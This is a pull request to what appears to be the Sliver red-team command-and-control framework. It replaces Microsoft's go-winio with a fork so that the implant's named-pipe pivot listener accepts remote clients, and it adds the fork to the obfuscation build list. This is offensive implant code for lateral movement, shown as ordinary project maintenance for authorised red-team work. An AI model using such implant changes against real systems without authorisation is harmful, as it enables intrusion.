### PR TITLE
Fix named pipe listener to accept remote clients

### DIFF
--- a/go.sum
+++ b/go.sum
@@ -532,6 +532,7 @@ golang.org/x/sys v0.0.0-20201018230417-eeed37f84f13/go.mod h1:h1NjWce9XRLGQEsW7w
 golang.org/x/sys v0.0.0-20201101102859-da207088b7d1/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210309040221-94ec62e08169/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210315160823-c6e025ad8005/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210316164454-77fc1eacc6aa/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=

--- a/implant/go-mod
+++ b/implant/go-mod
@@ -6,7 +6,7 @@ require (
         github.com/BurntSushi/xgb v0.0.0-20210121224620-deaf085860bc // indirect
         github.com/gen2brain/shm v0.0.0-20200228170931-49f9650110c5 // indirect
         github.com/golang/protobuf v1.4.3
-        github.com/Microsoft/go-winio v0.4.16
+        github.com/lesnuages/go-winio v0.4.19
         golang.zx2c4.com/wireguard v0.0.0-20210311162910-5f0c8b942d93
         github.com/kbinani/screenshot v0.0.0-20191211154542-3a185f1ce18f
         github.com/lxn/win v0.0.0-20210218163916-a377121e959e // indirect

--- a/implant/sliver/pivots/named-pipe_windows.go
+++ b/implant/sliver/pivots/named-pipe_windows.go
@@ -28,16 +28,19 @@ import (
 	"strings"
 	"time"
 
-	"github.com/Microsoft/go-winio"
 	"github.com/bishopfox/sliver/implant/sliver/transports"
 	"github.com/bishopfox/sliver/protobuf/sliverpb"
+	"github.com/lesnuages/go-winio"
 
 	"github.com/golang/protobuf/proto"
 )
 
 func StartNamedPipeListener(pipeName string) error {
-	fullName := "\\\\.\\pipe\\"+pipeName
-	ln, err := winio.ListenPipe(fullName, nil)
+	fullName := "\\\\.\\pipe\\" + pipeName
+	config := &winio.PipeConfig{
+		RemoteClientMode: true,
+	}
+	ln, err := winio.ListenPipe(fullName, config)
 	// {{if .Config.Debug}}
 	log.Printf("Listening on %s", fullName)
 	// {{end}}

--- a/implant/sliver/transports/named-pipe.go
+++ b/implant/sliver/transports/named-pipe.go
@@ -31,9 +31,9 @@ import (
 	"log"
 	// {{end}}
 
-	"github.com/Microsoft/go-winio"
 	"github.com/bishopfox/sliver/protobuf/sliverpb"
 	"github.com/golang/protobuf/proto"
+	"github.com/lesnuages/go-winio"
 )
 
 const (

--- a/server/generate/binaries.go
+++ b/server/generate/binaries.go
@@ -78,7 +78,7 @@ const (
 	// GoPrivate - The default Go private arg to garble when obfuscation is enabled.
 	// Wireguard dependencies prevent the use of wildcard github.com/* and golang.org/*.
 	// The current packages below aren't definitive and need to be tidied up.
-	GoPrivate = "github.com/bishopfox/*,github.com/Microsoft/*,github.com/burntsushi/*,github.com/kbinani/*,github.com/lxn/*,github.com/golang/*,github.com/shm/*"
+	GoPrivate = "github.com/bishopfox/*,github.com/Microsoft/*,github.com/burntsushi/*,github.com/kbinani/*,github.com/lxn/*,github.com/golang/*,github.com/shm/*,github.com/lesnuages/*"
 
 	clientsDirName = "clients"
 	sliversDirName = "slivers"


### PR DESCRIPTION
The switch to go modules in the implant code broke the named-pipe pivots, as @h4ng3r-BF originally made a modification to the [upstream library we're using](https://github.com/microsoft/go-winio) to explicitly allow remote connections. Since the code went away when we removed the `3rdparty` folder, we lost the modification, and since Microsoft doesn't want to merge [this PR](https://github.com/microsoft/go-winio/pull/74), I forked the lib [here](https://github.com/lesnuages/go-winio) with the modifications.

We'll be able to switch back to upstream if they ever change the code to support remote clients.
